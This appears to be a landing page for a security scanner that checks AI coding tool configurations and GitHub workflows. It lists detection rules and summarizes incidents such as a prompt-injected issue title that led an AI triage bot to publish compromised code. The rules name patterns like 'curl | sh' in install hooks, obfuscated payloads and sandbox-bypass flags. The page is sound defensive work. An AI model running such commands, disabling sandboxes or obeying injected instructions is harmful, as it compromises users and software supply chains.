Security scanner that catches prompt injection, supply chain attacks, and invisible backdoors in AI coding tool configurations. The same patterns behind Clinejection, Cacheract, and the Shai-Hulud npm worm.
$ npx aidevshield scan .
aidevshield v1.0.0 — AI Workflow Security Scanner
Scanning: /home/user/my-project
Checks: workflows | package.json | AI configs | .gitignore
[CRITICAL] .github/workflows/ai-triage.yml:18
Wildcard user permissions on AI workflow
allowed_non_write_users: "*" lets any GitHub user trigger this workflow
Fix: Restrict to specific trusted usernames or remove the wildcard
[CRITICAL] .github/workflows/pr-deploy.yml:5
pull_request_target with untrusted checkout (Pwn Request)
Checking out PR head runs attacker code with access to secrets
Fix: Use pull_request trigger instead, or checkout base ref
[HIGH] node_modules/shady-pkg/package.json
curl | sh in postinstall lifecycle script
Executes remote code during npm install — Shai-Hulud attack pattern
Fix: Remove the dependency or pin to a verified version
[CRITICAL] .cursorrules:1
Hidden Unicode characters detected (invisible prompt injection)
3 zero-width joiners found — invisible to humans, read by AI
Fix: Remove non-visible characters or regenerate the file
24 issues found (6 critical, 8 high, 6 medium, 2 low, 2 info)
22 detection rules across three attack surfaces. Every rule maps to a real-world exploit.
Wildcard user permissions on AI workflows
Clinejection
Untrusted input interpolation (${{ github.event.issue.title }})
Script injection
pull_request_target with untrusted checkout
Pwn Request
AI workflow triggered by issues/comments
Prompt injection
AI step with shell execution capability
RCE via AI
Unpinned third-party actions (mutable tags)
tj-actions attack
Cache + credentials in same workflow
Cacheract
curl | sh / wget | bash in lifecycle scripts
Shai-Hulud worm
npm install -g in lifecycle hooks
Global package hijack
eval() / exec() / child_process in scripts
Arbitrary code execution
base64 decode / new Function()
Obfuscated payloads
Hidden Unicode characters (zero-width, RTL marks)
Invisible prompt injection
Bash(*) wildcard permissions
Unrestricted shell access
dangerouslyDisableSandbox: true
Sandbox bypass
dangerously-skip-permissions
Permission bypass
Every detection rule exists because of a real incident. These aren't theoretical.
5M+ developers exposed
Attacker opened a GitHub issue with prompt injection in the title. Cline's AI triage bot published compromised code to the VS Code Marketplace.
aidevshield detects: Wildcard permissions, untrusted input interpolation, AI action with shell execution
23,000+ repos compromised
Exploited pull_request_target to steal a PAT, then compromised tj-actions/changed-files. Tags silently repointed. Ultimate target: Coinbase.
aidevshield detects: pull_request_target with untrusted checkout, unpinned third-party actions
Any repo using GitHub Actions cache
GitHub Actions caches poisoned to replace node_modules with malicious code. When publishing workflows restore the cache, attacker code runs with NPM_TOKEN access.
aidevshield detects: actions/cache combined with credential secrets in same workflow
500+ packages, self-propagating
First self-propagating worm in npm. Used postinstall hooks with curl | bash. Harvested tokens and self-replicated to other packages owned by the same maintainer.
aidevshield detects: curl | bash patterns, suspicious lifecycle scripts in node_modules/
npx aidevshield scan .
Follow the fix suggestions
Add to .github/workflows/
# CI/CD Integration
# .github/workflows/security.yml
name: AI Security Check
on: [push, pull_request]
jobs:
aidevshield:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npx aidevshield scan .No API keys, no network requests, no telemetry
Just js-yaml. Node 16+. Nothing else.
Text, JSON, and SARIF 2.1.0 for GitHub Code Scanning
Every detection rule tested against realistic fixtures